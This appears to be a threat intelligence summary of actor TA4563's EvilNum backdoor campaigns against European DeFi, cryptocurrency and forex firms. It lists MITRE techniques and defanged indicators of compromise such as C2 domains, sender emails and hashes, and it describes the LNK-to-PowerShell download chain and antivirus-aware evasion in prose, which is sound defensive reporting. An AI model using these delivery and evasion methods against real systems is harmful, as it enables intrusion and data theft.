TA4563 is a threat actor using the EvilNum backdoor to target European DeFi, cryptocurrency, and forex entities, with campaigns evolving in how they deliver the malware and evade defenses. EvilNum functions as a backdoor for data theft and loading additional payloads, featuring components that evade detection and adapt infection paths based on the target antivirus. #TA4563 #EvilNum #DeFi #cryptocurrency #forex
Keypoints
- TA4563 targets European financial and investment entities in the DeFi, cryptocurrency, and forex sectors with the EvilNum backdoor.
- EvilNum serves as a backdoor capable of data theft and loading follow-on payloads.
- Campaigns used ISO, Microsoft Word, and LNK files, remote templates, and OneDrive URLs to deliver EvilNum.
- Delivery campaigns evolved from late 2021 into 2022, including Word document lures and direct LNK payloads.
- The malware includes detection-evasion logic that adapts based on the host’s antivirus (e.g., Avast, AVG, Windows Defender) and uses existing local executables to evade defenses.
- Indicators of compromise include multiple domains, URLs, emails, and file hashes linked to EvilNum activity and C2 infrastructure.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – The initial campaign observed included the attempted delivery of Microsoft Word documents responsible for the attempted installation of the updated version of the EvilNum backdoor. “The initial campaign observed included the attempted delivery of Microsoft Word documents responsible for the attempted installation of the updated version of the EvilNum backdoor.”
- [T1566.002] Spearphishing Link – The group continued to target financial entities with a variation on the original email campaign, attempting to deliver multiple OneDrive URLs that contained either an ISO or .LNK attachment. “The group continued to target financial entities with a variation on the original email campaign, attempting to deliver multiple OneDrive URLs that contained either an ISO or .LNK attachment.”
- [T1059.001] PowerShell – The initial stage LNK loader is responsible for executing PowerShell via cmd.exe, this then downloads two different payloads from the initial host. “The initial stage LNK loader is responsible for executing PowerShell via cmd.exe, this then downloads two different payloads from the initial host (e.g. infntio[.]com).”
- [T1105] Ingress Tool Transfer – The malware downloads two different payloads from the initial host. “this then downloads two different payloads from the initial host (e.g. infntio[.]com).”
- [T1113] Screen Capture – The second PowerShell/C# stage sends screenshots to a command-and-control server (C2). “sends screenshots to a command-and-control server (C2).”
- [T1027] Obfuscated/Compressed Files and Information – The malware uses encrypted blobs that decrypt to executables and shellcode, including a final decrypted and decompressed PE file. “two encrypted blobs… The first is decrypted to an executable… The second to a TMP file… The final decrypted and decompressed PE file.”
- [T1562.001] Impair Defenses – The malware adjusts its execution chain to evade detection by the identified antivirus engine on the host. “The malware execution chain will change to best evade detection from the identified antivirus engine.”
Indicators of Compromise
- [Domain] – payload domains used by EvilNum infrastructure (e.g., mailgunltd[.]com, officelivecloud[.]com, azuredllservices[.]com)
- [URL] – Command/Control and payload delivery URLs (e.g., outlookfnd[.]com, infntio[.]com/save/user.php, advflat[.]com/save/user.php)
- [URL] – OneDrive delivery/redirect URLs used in campaigns (e.g., onedrive.live[.]com/download?resid=…)
- [Email] – sender addresses observed in campaigns (e.g., viktoria.helle79@zingamail[.]uk, arfeuille19@gmail[.]com, arone@…)
- [SHA256] – sample hashes linked to Word docs and LNK files (e.g., ef1a660ee8b11bbcf681e8934c5f16e4a249ba214d743bbf8b1f8043296b6ffc, da642cc233ea3595d8aaf8daf6129c59682b19462d5d5abb1f494042d4c044f4)
- [URL] – additional command-and-control domains (e.g., outlookfnd[.]com, visitaustriaislands[.]com)